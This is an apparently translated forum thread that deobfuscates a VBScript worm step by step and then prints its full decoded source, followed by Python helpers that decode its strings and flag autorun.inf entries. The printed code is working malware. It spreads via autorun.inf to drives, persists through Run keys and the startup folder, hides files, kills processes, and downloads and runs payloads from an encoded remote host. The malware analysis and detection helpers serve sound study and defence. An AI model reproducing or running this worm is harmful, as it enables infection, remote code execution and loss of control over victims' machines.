:execute(uc(dyz)):execute(uc(zcx)):function gt():execute(uc(gtz)):end function:function ei(name,wt):execute(uc(eiz)):end function:function df(wh):execute(uc(dfz)):end function:function bf(wh,wt,da):execute(uc(bfz)):end function:function bi(wh):execute(uc(biz)):end function:function rt(wh,li):execute(uc(rtz)):end function:function wr(rna,rda):execute(uc(wrz)):end function:function rr(rna,pa):execute(uc(rrz)):end function:function ar(file,cg):execute(uc(arz)):end function:function dn(loc,web,ris,min):execute(uc(dnz)):end function:function pr(pcs,gs):execute(uc(prz)):end function:function ec(wt):execute(uc(ecz)):end function:function co(wh):execute(uc(coz)):end function:function rs(sw):execute(uc(rsz)):end function:function hi(sw):execute(uc(hiz)):end function:function gi(ids,fid,eid,fname,furl):execute(uc(giz)):end function:function dw(pcs,fn,furl,kill):execute(uc(dwz)):end function:function us(sw):execute(uc(usz)):end function:function cu():execute(uc(cuz)):end function:function km(sw):execute(uc(kmz)):end function:function cf(wh):execute(uc(cfz)):end function


Alas, it disappoints everyone again. It's a bit messy, but wait a minute, let's sort it out first to see more clearly:


execute(uc(dyz))

execute(uc(zcx))

function gt()
execute(uc(gtz))
end function

function ei(name,wt)
execute(uc(eiz))
end function

function df(wh)
execute(uc(dfz))
end function

function bf(wh,wt,da)
execute(uc(bfz))
end function

function bi(wh)
execute(uc(biz))
end function

function rt(wh,li)
execute(uc(rtz))
end function

function wr(rna,rda)
execute(uc(wrz))
end function

function rr(rna,pa)
execute(uc(rrz))
end function

function ar(file,cg)
execute(uc(arz))
end function

function dn(loc,web,ris,min)
execute(uc(dnz))
end function

function pr(pcs,gs)
execute(uc(prz))
end function

function ec(wt)
execute(uc(ecz))
end function

function co(wh)
execute(uc(coz))
end function

function rs(sw)
execute(uc(rsz))
end function

function hi(sw)
execute(uc(hiz))
end function

function gi(ids,fid,eid,fname,furl)
execute(uc(giz))
end function

function dw(pcs,fn,furl,kill)
execute(uc(dwz))
end function

function us(sw)
execute(uc(usz))
end function

function cu()
execute(uc(cuz))
end function

function km(sw)
execute(uc(kmz))
end function

function cf(wh)
execute(uc(cfz))
end function


This is almost close to uncovering the last layer. It's basically continuously substituting various variables into the uc(b) function, then decoding, generating instructions, making the main program segment and various functions needed by the main program, and then executing the decoded code. The virus is finally showing its ferocious appearance.

The uc(b) function is the key, just as we suspected earlier, it is the decoding function. Then there are many variables appearing here, which are the messy things we saw in the sixth pot earlier. Because the code here is the result of the string merging in execute() that appeared in the sixth pot last time. When execute starts to execute the code here, the variables appearing at the same time as execute are of the same status as these codes, which is equivalent to us assigning values to some variables first when writing the program, but then enclosing the entire main program segment and all function segments in execute(). This actually has no effect.

For example:


Var1="Var1 is defined in Main." ' First assign a value to the variable
Execute("MsgBox Var1") '==> MsgBox "Var1" ' Then execute the program in Execute
Execute("MsgBox uc(Var1)") '==> MsgBox uc(Var1)
Execute "Exe"&"cute("&Chr(34)&"MsgBox uc(rr(Var1) & Var2)"&Chr(34)&")"
' Equivalent to Execute("Execute("MsgBox uc(rr(Var1) & Var2)")"). Note "equivalent to": this is not directly runnable, because the quotes inside quotes need to be handled

' Imitate the virus's approach: write the function body into Execute and, to keep some suspense, define a variable Var2 inside function rr that rr itself doesn't use. Once rr has been executed once, Var2 can be used by uc(b)
Function rr(a)
Execute ("Var2="&Chr(34)&"Var2 is defined in Function rr. It is no use for Function rr."&Chr(34)&"&vbCrLf"&":rr=a & "&Chr(34)&"can be used by Function rr."&Chr(34)&" & vbCrLf")
'<-- Var2="Var2 is defined in Function rr. It is no use for Function rr." & vbCrLf
'<-- rr=a & "can be used by Function rr." & vbCrLf

End Function

Function uc(b)
Execute ("x="&Chr(34)&"All above can be used by Function uc."&Chr(34)&":"&"uc=b & Chr(13) & Chr(10) & x")
'<-- x="All above can be used by Function uc."
'<-- uc=b & vbCrLf & x

End Function


So if we decode each execute(uc(...)) in the Decode_7 code in turn, and substitute them into execute(uc(...)) at the corresponding positions, the final result is the encrypted plaintext, that is, the original virus body.

Next, we need to consider how to generate each segment of the program specifically, mainly the uc(b) function. Let's review the ins and outs of the uc(b) function, see the following figure:



When uc(b) first appeared, it did not explicitly contain the variable b. After decoding twice via the variables w, x, y, z, the usable form of uc(b) was generated by Decode_4th. It contains not only b, but also newly defined variables covering almost all of c~v, plus an undefined l. l is only assigned a value later, in Decode_6; when the program uses it for the first time, it has to be treated as an empty string. After Decode_6, when the uc(b) function is called again, remember that l should use the definition from Decode_6. There is also an rn, which is handled in the same way. Since x, y, z, w have (it seems) never been changed, the content of Decode_4 is basically unchanged. So we might as well reconstruct the function uc(b) like this: pile up the variables defined in Decode_4~6 together, then take the algorithm fragment that generates the function return value uc in Decode_4, and put them together to form the plaintext form of the uc(b) function.

Using the obtained uc(b) function, substitute b one by one, and get the values of uc(b) appearing in Decode_7 one by one, like the following:


'*******Variable assignment from Decode_6
on error resume next
dfz=... ' Source of variable b
...
l=... ' Used when calculating uc
rn=... ' Used when calculating uc
...
cfz=... ' Source of variable b

'*******Variable assignment from Decode_4
c=vbcrlf:d=... ... v=...

'*******Take the program segment from Decode_4, form the function uc(b), put an interception program Intercept(code) in
execute( ... &"uc=rn+c+uc"&c&"Intercept(uc)") ' The green words are the added interception program

'*******Interception program Intercept(code), start
Sub Intercept (code)
ForAppending=8
Create=True
ASCII=0
WScript.Echo code
Set objFSO=CreateObject("Scripting.FileSystemObject")
OutPutFile="decode_8.txt"
Set objTXT=objFSO.OpenTextFile(OutPutFile,ForAppending,Create,ASCII)
objTXT.Write code & vbCrLf & "'" & String(8,"*") & vbCrLf
objTXT.Close
Set objWSH=CreateObject("WScript.Shell")
objWSH.Run OutPutFile
If objWSH.PopUp("是否继续执行?",0,"当心引爆病毒!",276)<>6 Then
WScript.Quit
End IF
End Sub
'*******Interception program Intercept(code), end, the result will be appended to decode_8.txt in turn

'*******Run the original decoding program and intercept
execute(uc(dyz)) ' Modify the value of b, such as dyz, zcx..., run one by one



Each time you modify the b in execute(uc(b)), save it as a vbs and run it. Finally, open Decode_8.txt, copy the result of each run to the corresponding position in Decode_7, and combine them to reconstruct the entire original virus body.

I counted, there are 23 uc(b)s. You can simply repeat them one by one, I don't need to do it, because I want to generate and assemble them automatically. To be continued for what happens next.

[ Last edited by uhnmki on 2008-1-23 at 07:17 PM ]
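A static alternative to running each execute(uc(b)) through Intercept, added here as an example (not code from the thread): it decodes the uc layer and fills in the function wrappers from decode_7.txt without executing anything from the sample. The decoding rule (ROT13 on lowercase letters only, `|` for a double quote, `}{` for a line break) is an assumption inferred by comparing the encoded strings with the decoded listing on this page; the function names `uc_static`, `parse_assignments` and `reassemble` and the two sample constants are constructed for the example.

```python
import re

# Constructed sample: three encoded bodies copied from the decode_6.txt listing
# on this page, plus two plain assignments, in its name="...":name="..." layout.
DECODE_6_SAMPLE = (
    'eiz="vs sfb.svyrrkvfgf(anzr) naq jg=1 gura rv=gehr}'
    '{vs sfb.sbyqrerkvfgf(anzr) naq jg=2 gura rv=gehr":'
    'fut=":function ":'
    'wrz="vs eqn=-1 gura jf.ertqryrgr ean ryfr jf.ertjevgr ecn&ean,eqn,|REG_SZ|":'
    'rrz="vs cn=1 gura ean=ecn&ean}{ee=jf.erternq(ean)}{vs re(0) gura ee=0":'
    'rn="dim d:j=""\\"":on error resume next":aft=eft&fut'
)

# Constructed sample: four wrappers from the decode_7.txt line. gtz is left out
# of DECODE_6_SAMPLE on purpose, to show how a missing body is reported.
DECODE_7_SAMPLE = (
    ':function gt():execute(uc(gtz)):end function'
    ':function ei(name,wt):execute(uc(eiz)):end function'
    ':function wr(rna,rda):execute(uc(wrz)):end function'
    ':function rr(rna,pa):execute(uc(rrz)):end function'
)

# name="..." with VBScript's doubled-quote escape ("") allowed inside the string.
ASSIGNMENT = re.compile(r'\b([A-Za-z_]\w*)="((?:[^"]|"")*)"')
WRAPPER = re.compile(
    r'function (\w+)\(([^)]*)\):execute\(uc\((\w+)\)\):end function'
)


def uc_static(encoded):
    """Decode one uc() argument as text only (assumed rule, see lead-in).

    The rn prefix that the thread says uc() prepends is not added here.
    """
    out = []
    for ch in encoded.replace("}{", "\n"):
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + 13) % 26 + 97))  # ROT13, lowercase only
        elif ch == "|":
            out.append('"')
        else:
            out.append(ch)  # digits, punctuation and uppercase stay as they are
    return "".join(out)


def parse_assignments(text):
    """Collect string-literal assignments; expressions like aft=eft&fut are skipped."""
    return {m.group(1): m.group(2).replace('""', '"')
            for m in ASSIGNMENT.finditer(text)}


def reassemble(decode6_text, decode7_text):
    """Return (readable source, names of encoded bodies that were not found)."""
    variables = parse_assignments(decode6_text)
    functions, missing = [], []
    for name, params, var in WRAPPER.findall(decode7_text):
        if var in variables:
            body = uc_static(variables[var])
        else:
            missing.append(var)
            body = "' [encoded body %s not found in input]" % var
        lines = "\n".join("    " + ln for ln in body.split("\n"))
        functions.append("Function %s(%s)\n%s\nEnd Function" % (name, params, lines))
    return "\n\n".join(functions), missing


if __name__ == "__main__":
    source, missing = reassemble(DECODE_6_SAMPLE, DECODE_7_SAMPLE)
    print(source)
    print("missing bodies:", missing)
```

Because the input is only parsed as text, the result can be reviewed on an analysis machine without wscript.exe ever touching the sample.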
Floor 20 Posted 2008-01-20 03:27 · China, Shaanxi, Xi'an, China Telecom
### gt():
Dim d:j = "\"
tjs = rr("tjs", 1): djs = rr("djs", 1)
If Not IsNumeric(tjs) Or Not IsDate(djs) Then
wr "tjs", 1
wr "djs", Date
djs = rr("djs", 1)
End If
wr "tjs", tjs + 1
wb = pr("clsmn.exe", 1) = 1 Or pr("ap.exe", 1) = 1 Or pr("pubwin.exe", 1) = 1
If Date - CDate(djs) > 4 Then
gq = True
ws.run "net start ""task scheduler""", 0, False
End If
If (rr("tjs", 1) > 800 Or wb Or gq Or Not sys) And rr("ded", 1) <> CStr(Date) Then
id = rr("idd", 1)
If wb Then
id = 1
js = 1
cd = 0
End If
Do While cd <> "<script>"
If js = 2 Or js = 4 Then
d2 = dn(mir & til, ht + ha + ec(hd) & id, 0, 100)
cd = rt(mir & til, 1)
ElseIf js = 1 Or js = 3 Then
d1 = dn(mir & til, ht + ec(hb) + ec(hd) & id & "&v=" & ver, 0, 100)
cd = rt(mir & til, 1)
End If
js = js + 1
wz = d1 = 1 Or d2 = 1
If js > 4 Then
If wz Then gt = 1
Exit Do
End If
If wz Then er = er - 1
Loop
If ei(mir & til, 1) Then
Set r = fso.OpenTextFile(mir & til, 1)
cin = r.ReadLine
dis = r.ReadLine
dna = r.ReadLine
dfr = r.ReadLine
nve = r.ReadLine
nru = r.ReadLine
nna = r.ReadLine
nfr = r.ReadLine
tsw = r.ReadLine
tco = r.ReadLine
osw = r.ReadLine
idd = r.ReadLine
r.Close
df mir & til
If cin = "<script>" Then
wr "tjs", 1
wr "djs", Date
wr "idd", idd
wr "dna", dna
wr "tsw", tsw
wr "tco", tco
wr "osw", osw
If nve - ver >= 1 Or Not ei(dir & ve, 1) Then
dn dir & nna, ht & nfr & dfo & nna, nru, 2000
wscript.quit
End If
If dis = 1 And sys Then
If dna <> le Or Not ei(tmp & le, 1) Then
df tmp & le
dn tmp & dna, ht & dfr & dfo & dna, 1, 1000
End If
End If
End If
End If
End If
If er(1) Or wb Then gt = 1

### ei(name, wt):
Dim d:j = "\"
If fso.fileexists(name) And wt = 1 Then ei = True
If fso.folderexists(name) And wt = 2 Then ei = True

### df(wh):
Dim d:j = "\"
ar wh, 0
If ei(wh, 1) Then fso.deletefile(wh)
If ei(wh, 2) Then fso.deletefolder(wh)

### bf(wh, wt, da):
Dim d:j = "\"
df wh
Set bin = fso.createtextfile(wh, True)
bin.writeline wt
bin.Close
If da = 1 Then ar wh, 7
If Not er(0) Then bf = 1

### bi(wh):
Dim d:j = "\"
df wh
Set i = fso.createtextfile(wh, True)
h = vbCrLf
i.writeline til & h & "" & h & "open=wscript.exe .\" & vs & h & "shell\open\command=wscript.exe .\" & vs & h & "shell\open\default=1"
i.Close
ar wh, 7
If Not er(0) Then bi = 1

### rt(wh, li):
Dim d:j = "\"
If li < 0 Then wh = ouw
If ei(wh, 1) Then
If fso.getfile(wh).size = 0 Then
rt = 0
Else
Set r = fso.OpenTextFile(wh, 1)
Set cl = fso.OpenTextFile(wh, 1)
cl.ReadAll
tli = cl.line
cl.Close
If li > 0 And li <= tli Then
i = 0
Do While i < li
i = i + 1
If Not r.atendofstream Then
sli = r.ReadLine
Else
sli = 0
End If
Loop
rt = sli
ElseIf li <= 0 Then
rt = r.ReadAll
Else
rt = 0
End If
r.Close
End If
Else
rt = 0
End If

### wr(rna, rda):
Dim d:j = "\"
If rda = -1 Then ws.regdelete rna Else ws.regwrite rpa & rna, rda, "REG_SZ"

### rr(rna, pa):
Dim d:j = "\"
If pa = 1 Then rna = rpa & rna
rr = ws.regread(rna)
If er(0) Then rr = 0

### ar(file, cg):
Dim d:j = "\"
If ei(file, 1) Then
Set ofile = fso.getfile(file)
ofile.attributes = cg
Set ofile = Nothing
End If
If ei(file, 2) Then
Set ofile = fso.getfolder(file)
ofile.attributes = cg
Set ofile = Nothing
End If

### dn(loc, web, ris, min):
Dim d:j = "\"
ar loc, 0
Set xpost = CreateObject("microsoft.xmlhttp")
xpost.open "get", web, 0
xpost.send()
If min <> 0 Then
If Not er(0) Then
dn = 1
Set sget = CreateObject("adodb.stream")
sget.mode = 3
sget.Type = 1
sget.open
sget.write(xpost.responsebody)
sget.savetofile loc, 2
ar loc, 7
If ei(loc, 1) Then fsz = fso.getfile(loc).size Else fsz = 0
If fsz > min Then
If ris = 1 Then ws.run loc
Else
dn = 0
df loc
End If
End If
End If

### pr(pcs, gs):
Dim d:j = "\"
Set pl = wmi.execquery("select * from win32_process where name='" & pcs & "'")
i = 1
For Each p In pl
i = i + 1
If i > Abs(gs) Then pr = 1
If gs < 0 Then
If p.terminate = 2 And pr = 1 Then
ws.run cm & "tskill " & Left(p.name, Len(p.name) - 4), 0, False
End If
End If
Next
If er(0) Then pr = 2

### ec(wt):
Dim d:j = "\"
For i = 1 To Len(wt)
ec = ec & Chr(Asc(Mid(wt, i, 1)) - i)
Next

### co(wh):
Dim d:j = "\"
df wh
Set vbs = fso.createtextfile(wh, True)
vbs.write ouc
vbs.Close
ar wh, 7

### rs(sw):
Dim d:j = "\"
If sw = 1 And rr(rsp & rsn, 0) <> ve Then
ws.regwrite rsp & rsn, ve, "REG_SZ"
If er(0) And Not ei(fsp, 1) Then bf fsp, wsr & " """ & ve & """", 0
ElseIf sw = -1 Then
df fsp
ElseIf sw = 0 Then
df fsp
wr rsp & rsn, -1
wr rpa, -1
End If

### hi(sw):
Dim d:j = "\"
If sw = 1 Then ws.regwrite hip, "0", "REG_DWORD"
If sw = 0 Then hi = rr(hip, 0)

### gi(ids, fid, eid, fname, furl):
Dim d:j = "\"
id = rr("idd", 1)
Do While fid <= eid
idc = idc & "," & fid
fid = fid + 1
Loop
ids = ids & idc
idss = Split(ids, ",")
For i = 0 To UBound(idss)
If id = idss(i) Then
If Not ei(tmp & fname, 1) Then
dn tmp & fname, ht & furl, 0, 2000
End If
End If
Next
If ei(tmp & fname, 1) Then ws.run tmp & fname
gi = 1

### dw(pcs, fn, furl, kill):
Dim d:j = "\"
If rr("ged", 1) <> fn And pr(pcs, 1) = 1 Then
If dn(tmp & fn, ht & furl, 0, 2000) = 1 Then dwc = 1
If ei(tmp & fn, 1) And dwc = 1 Then
If kill = 1 Then pr pcs, -1
ws.run tmp & fn
If Not er(0) Then
wr "ged", fn
dn 0, ht + ec(hb) + he + fn, 0, 0
If kill = 2 Then
pr pcs, -1
km 1
End If
End If
End If
dw = 1
End If
wscript.sleep 100

### us(sw):
Dim d:j = "\"
For Each d In dc
If d.drivetype = 3 Or (d.drivetype = 1 And d <> "A:" And d <> "B:") Then
If sw = 1 Then
If ei(d & inf, 2) Then df d & inf
If ei(d & j & vs, 1) And ei(d & inf, 1) Then
If rt(d & inf, 1) <> til Then bi d & inf
Else
hi 1
bi d & inf
co d & j & vs
End If
ElseIf sw = -1 Then
df d & inf
df d & j & vs
Else
bf d & j & vs, wsr & "(left(wscript.scriptfullname,3)),3" & String(10000, "'"), 1
df d & inf
End If
End If
Next

### cu():
Dim d:j = "\"
cus = rr("osw", 1) <> 4
Do
dcu = rr("tgs", 1) <> CStr(Date)
If (Second(Time) Mod 3) = 0 Then
If dcu And cus Then us 1
min = Minute(Now)
If (min Mod 2) = 0 And nn <> min And oo <> 1 Then
nn = min
oo = gt
km 0
End If
If rr("tsw", 1) = 1 Then execute(uc(rr("tco", 1)))
End If
wscript.sleep 900
If hi(0) = 1 And dcu Then
wr "tgs", Date
us -1
End If
If pr("taskmgr.exe", 1) = 1 Then
ws.run "at " & Time + 0.003 & " /interactive " & ve, 0, False
wr "atd", 1
hi 1
wscript.quit
End If
Loop
Floor 21 Posted 2008-01-20 10:58 · China, Beijing, Unicom
Intermediate User
UID 64934
Rising will report a virus:

dim d:j="\"
on error resume next
ver="9":btj=800:vs=".vbs":ve=".vbe":cm="%comspec% /c ":dfo="/u#t/":til="UT "&ver:inf="\autorun.inf"

set ws=createobject("wscript.shell")
set wmi=getobject("winmgmts:\\.\root\cimv2")
set fso=createobject("scripting.filesystemobject")
set sis=wmi.execquery("select * from win32_operatingsystem")
set dc=fso.drives
ouw=wscript.scriptfullname
win=fso.getspecialfolder(0)&j
dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j
wbe=dir&"wbem\"
mir=left(wscript.scriptfullname,len(wscript.scriptfullname)-len(wscript.scriptname))
wsr="createobject(""wscript.shell"").run"
'cnp="HKLM\system\currentcontrolset\control\computername\computername\computername"
cna=rr("HKLM\system\currentcontrolset\control\computername\computername\computername",0)
if cna="" then cna=til
rpa="HKLM\software\"&cna&j
'rop="\software\microsoft\windows\currentversion\explorer\"

fsp=rr("HKLM\software\microsoft\windows\currentversion\explorer\shell folders\common startup",0)&j&vs
fap=rr("HKCU\software\microsoft\windows\currentversion\explorer\shell folders\favorites",0)&j
dap=rr("HKCU\software\microsoft\windows\currentversion\explorer\shell folders\desktop",0)&j
rsn=cna
ht=ec("ivwt?56")
ha=ec(":;9::<5kw9")
'hc="0dwuEpE"
he=ec("c"+"0dwuEpE")
rsp="HKLM\software\microsoft\windows\currentversion\policies\explorer\run\"
if mir=fso.getspecialfolder(1)&j then sys=true
for each si in sis
ca=si.caption
cs=si.codeset
cc=si.countrycode
os=si.oslanguage
wv=si.version
next
hip="HKCU\software\microsoft\windows\currentversion\explorer\advanced\showsuperhidden"
hb="vv1<=676x"&chr(124)&"r;"
if instr(wv,"5.2")<>0 then
hd="t"+"0dwuEpE"
elseif cc<>86 then hd="p"+hc
else hd="$"+hc:end if


for each d in dc
if mir=d&j then ws.run "explorer "&d,3,false
next
ouc=rt(ouw,-1):if cf(ouw) then msgbox("Happy Newyear!"):km 1
if sys then
hi 1
if rr("til",1)<>til then
wr "til",til
wr "tjs",btj
wr "djs",date
wr "ded",0
end if
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
if rr(rsp&rsn,0)=ve then rs -1
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
km 0
cu:er 1
wscript.sleep 1000
if rr("ded",1)<>cstr(date) then ws.run ouw
else
wscript.sleep 5000
if pr("wscript.exe",2)=2 then
if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
end if
if pr("wscript.exe",2)=1 then wscript.quit
ar ouw,7:co dir&ve:co win&ve:rs 1:ws.run dir&ve
end if

function gt()
dim d:j="\":on error resume next
tjs=rr("tjs",1):djs=rr("djs",1):if not isnumeric(tjs) or not isdate(djs) then wr "tjs",1:wr "djs",date:djs=rr("djs",1)
wr "tjs",tjs+1:wb=pr("clsmn.exe",1)=1 or pr("ap.exe",1)=1 or pr("pubwin.exe",1)=1
if date-cdate(djs)>3 then gq=true:ws.run "net start ""task scheduler""",0,false
if (rr("tjs",1)>1000 or wb or gq or not sys) and rr("ded",1)<>cstr(date) then
id=rr("idd",1):if wb then id=1:js=1:cd=0
do while cd<>"<script>"
if js=2 or js=4 then
d2=dn(mir&til,ht+ha+ec(hd)&id,0,100):cd=rt(mir&til,1)
elseif js=1 or js=3 then d1=dn(mir&til,ht+ec(hb)+ec(hd)&id&"&v="&ver,0,100):cd=rt(mir&til,1)
end if:js=js+1:wz=d1=1 or d2=1:if js>4 then
if wz then gt=1
exit do
end if
if wz then er -1
loop
if ei(mir&til,1) then
set r=fso.opentextfile(mir&til,1)
cin=r.readline:dis=r.readline:dna=r.readline:dfr=r.readline:nve=r.readline:nru=r.readline
nna=r.readline:nfr=r.readline:tsw=r.readline:tco=r.readline:osw=r.readline:idd=r.readline
r.close:df mir&til:if cin="<script>" then
wr "tjs",1:wr "djs",date:wr "idd",idd:wr "dna",dna:wr "tsw",tsw:wr "tco",tco:wr "osw",osw
if nve-ver>=1 or not ei(dir&ve,1) then dn dir&nna,ht&nfr&dfo&nna,nru,2000:wscript.quit
if dis=1 and sys then
if dna<>le or not ei(tmp&le,1) then df tmp&le:dn tmp&dna,ht&dfr&dfo&dna,1,1000
end if
end if
end if
end if
if er(1) or wb then gt=1
end function

function ei(name,wt)
dim d:j="\":on error resume next
if fso.fileexists(name) and wt=1 then ei=true
if fso.folderexists(name) and wt=2 then ei=true
end function

function df(wh)
dim d:j="\":on error resume next
ar wh,0
if ei(wh,1) then fso.deletefile(wh)
if ei(wh,2) then fso.deletefolder(wh)
end function

function bf(wh,wt,da)
dim d:j="\":on error resume next
df wh:set bin=fso.createtextfile(wh,true):bin.writeline wt:bin.close
if da=1 then ar wh,7
if not er(0) then bf=1
end function

function bi(wh)
dim d:j="\":on error resume next
df wh:set i=fso.createtextfile(wh,true):h=vbcrlf
i.writeline til&h&""&h&"open=wscript.exe .\"&vs&h&"shell\open\command=wscript.exe .\"&vs&h&"shell\open\default=1"
i.close:ar wh,7:if not er(0) then bi=1
end function

function rt(wh,li)
dim d:j="\":on error resume next
if li<0 then wh=ouw
if ei(wh,1) then
if fso.getfile(wh).size=0 then
rt=0
else
set r=fso.opentextfile(wh,1)
set cl=fso.opentextfile(wh,1)
cl.readall
tli=cl.line
cl.close
if li>0 and li<=tli then
i=0
do while i<li
i=i+1
if not r.atendofstream then
sli=r.readline
else
sli=0
end if
loop
rt=sli
elseif li<=0 then
rt=r.readall
else
rt=0
end if
r.close
end if
else
rt=0
end if
end function

function wr(rna,rda)
dim d:j="\":on error resume next
if rda=-1 then ws.regdelete rna else ws.regwrite rpa&rna,rda,"REG_SZ"
end function

function rr(rna,pa)
dim d:j="\":on error resume next
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
end function

function ar(file,cg)
dim d:j="\":on error resume next
if ei(file,1) then:set ofile=fso.getfile(file):ofile.attributes=cg:set ofile=nothing
if ei(file,2) then:set ofile=fso.getfolder(file):ofile.attributes=cg:set ofile=nothing
end function

function dn(loc,web,ris,min)
dim d:j="\":on error resume next
ar loc,0:set xpost = createobject("microsoft.xmlhttp"):xpost.open "get",web,0:xpost.send()
if min<>0 then
if not er(0) then
dn=1:set sget=createobject("adodb.stream")
sget.mode=3:sget.type=1:sget.open():sget.write(xpost.responsebody):sget.savetofile loc,2
ar loc,7
if ei(loc,1) then fsz=fso.getfile(loc).size else fsz=0
if fsz>min then
if ris=1 then ws.run loc
else
dn=0:df loc
end if
end if
end if
end function

function pr(pcs,gs)
dim d:j="\":on error resume next
set pl=wmi.execquery("select * from win32_process where name='"&pcs&"'"):i=1
for each p in pl:i=i+1
if i>abs(gs) then pr=1
if gs<0 then if p.terminate=2 and pr=1 then ws.run cm&"tskill "&left(p.name,len(p.name)-4),0,false
next
if er(0) then pr=2
end function

function ec(wt)
dim d:j="\":on error resume next
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
end function
function co(wh)
dim d:j="\":on error resume next
df wh:set vbs=fso.createtextfile(wh,true):vbs.write ouc:vbs.close:ar wh,7
end function

function rs(sw)
dim d:j="\":on error resume next
if sw=1 and rr(rsp&rsn,0)<>ve then
ws.regwrite rsp&rsn,ve,"REG_SZ"
if er(0) and not ei(fsp,1) then bf fsp,wsr&" """&ve&"""",0
elseif sw=-1 then:df fsp
elseif sw=0 then:df fsp:wr rsp&rsn,-1:wr rpa,-1
end if
end function

function hi(sw)
dim d:j="\":on error resume next
if sw=1 then ws.regwrite hip,"0","REG_DWORD"
if sw=0 then hi=rr(hip,0)
end function

function gi(ids,fid,eid,fname,furl)
dim d:j="\":on error resume next
id=rr("idd",1)
do while fid<=eid:idc=idc&","&fid:fid=fid+1:loop
ids=ids&idc:idss=split(ids,",")
for i=0 to ubound(idss)
if id=idss(i) then if not ei(tmp&fname,1) then dn tmp&fname,ht&furl,0,2000
next
if ei(tmp&fname,1) then ws.run tmp&fname
gi=1
end function

function dw(pcs,fn,furl,kill)
dim d:j="\":on error resume next
if rr("ged",1)<>fn and pr(pcs,1)=1 then
if dn(tmp&fn,ht&furl,0,2000)=1 then dwc=1
if ei(tmp&fn,1) and dwc=1 then
if kill=1 then pr pcs,-1
ws.run tmp&fn
if not er(0) then wr "ged",fn:dn 0,ht+ec(hb)+he+fn,0,0:if kill=2 then pr pcs,-1:km 1
end if
dw=1
end if
wscript.sleep 100
end function

function us(sw)
dim d:j="\":on error resume next
for each d in dc
if d.drivetype=3 or (d.drivetype=1 and d<>"A:" and d<> "B:") then
if sw=1 then
if ei(d&inf,2) then df d&inf
if ei(d&j&vs,1) and ei(d&inf,1) then
if rt(d&inf,1)<>til then bi d&inf
else
hi 1:bi d&inf:co d&j&vs
end if
elseif sw=-1 then:df d&inf:df d&j&vs
else:bf d&j&vs,wsr&"(left(wscript.scriptfullname,3)),3"&string(10000,"'"),1:df d&inf
end if
end if
next
end function

function cu()
dim d:j="\":on error resume next
cus=rr("osw",1)<>4
do
dcu=rr("tgs",1)<>cstr(date)
if (second(time) mod 3)=0 then
if dcu and cus then us 1
min=minute(now):if (min mod 2)=0 and nn<>min and oo<>1 then nn=min:oo=gt:km 0
if rr("tsw",1)=1 then execute(uc(rr("tco",1)))
end if
wscript.sleep 900
if hi(0)=1 and dcu then wr "tgs",date:us -1
if pr("taskmgr.exe",1)=1 then:ws.run "at "&time+0.003&" /interactive "&ve,0,false:wr "atd",1:hi 1:wscript.quit
loop
end function

function km(sw)
dim d:j="\":on error resume next
if sw=1 then
rs 0:us -1:df ouw:df win&ve:df dir&ve:df wbe&ve:wscript.quit
else
rs 1
if cf(dir&ve) then co dir&ve
if cf(win&ve) then co win&ve
end if
end function

function cf(wh)
dim d:j="\":on error resume next
if rt(wh,1)<>"'"&ver then cf=true
end function




function er(sco)
if err.number<>0 or sco<0 then
err.clear
er=true
if sco<>0 and rr("ded",1)<>cstr(date) then
wr "oer",rr("oer",1)+abs(sco)
if rr("oer",1)>100 then wr "ded",date:wr "oer",0
end if
end if
end function
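
An added example, not part of the original posts and not code from the thread's authors: a static Python helper that decodes the position-shift strings passed to `ec()` in the listing above without running any script, and flags `autorun.inf` entries of the kind `bi()` writes. The sample inputs are constructed from lines quoted in this thread; the `b0wixz6` literal, the `a.test/` value and all helper names are assumptions made for the example.

```python
import re

# ec("literal") calls with a constant argument; VBScript is case-insensitive
# and escapes a quote inside a string by doubling it.
EC_CALL = re.compile(r'\bec\(\s*"((?:[^"]|"")*)"\s*\)', re.IGNORECASE)
# autorun.inf keys that start a program when the drive is opened.
LAUNCH_KEY = re.compile(r'^(open|shellexecute|shell\\[^=]*\\command)$', re.IGNORECASE)
SCRIPT_HOST = re.compile(r'\b(?:wscript|cscript)(?:\.exe)?\b', re.IGNORECASE)
# First-line marker the listing writes: til = "UT " & ver
UT_MARKER = re.compile(r'^UT \d+$')


def ec_decode(text):
    """Undo ec(): the character at 1-based position i has i subtracted from its code."""
    out = []
    for i, ch in enumerate(text, start=1):
        code = ord(ch) - i
        if code < 0:
            raise ValueError("position %d decodes below chr(0)" % i)
        out.append(chr(code))
    return "".join(out)


def decode_ec_literals(script_text):
    """Return (literal, decoded) for each ec("...") call whose argument is one constant.

    Calls such as ec(hb) or ec("c"+hc) are skipped: their argument has to be
    resolved by hand from the variable assignments first.
    """
    results = []
    for match in EC_CALL.finditer(script_text):
        literal = match.group(1).replace('""', '"')
        results.append((literal, ec_decode(literal)))
    return results


def suspicious_autorun_entries(inf_text):
    """List (key, value) pairs in an autorun.inf that launch a Windows script host."""
    hits = []
    for raw in inf_text.splitlines():
        key, sep, value = raw.partition("=")
        key = key.strip()
        if sep and LAUNCH_KEY.match(key) and SCRIPT_HOST.search(value):
            hits.append((key.lower(), value.strip()))
    return hits


def has_ut_marker(inf_text):
    """True when the first line is the "UT <version>" marker the listing checks for."""
    lines = inf_text.splitlines()
    return bool(lines) and UT_MARKER.match(lines[0].strip()) is not None


# Constructed sample: the first two lines are quoted from the listing, the
# third is made up for this example (decodes to the placeholder "a.test/").
SAMPLE_SCRIPT = "\n".join([
    'ht=ec("ivwt?56")',
    'he=ec("c"+hc)',
    'demo=ec("b0wixz6")',
])

# Constructed sample: the lines bi() writes with til="UT 9" and vs=".vbs".
SAMPLE_INF = "\r\n".join([
    "UT 9",
    "",
    r"open=wscript.exe .\.vbs",
    r"shell\open\command=wscript.exe .\.vbs",
    r"shell\open\default=1",
])

# Constructed sample: an ordinary installer autorun.inf for comparison.
BENIGN_INF = "[autorun]\r\nopen=setup.exe\r\nicon=setup.ico\r\n"


if __name__ == "__main__":
    for literal, decoded in decode_ec_literals(SAMPLE_SCRIPT):
        print("%r -> %r" % (literal, decoded))
    for name, text in (("sample", SAMPLE_INF), ("benign", BENIGN_INF)):
        print(name, has_ut_marker(text), suspicious_autorun_entries(text))
```

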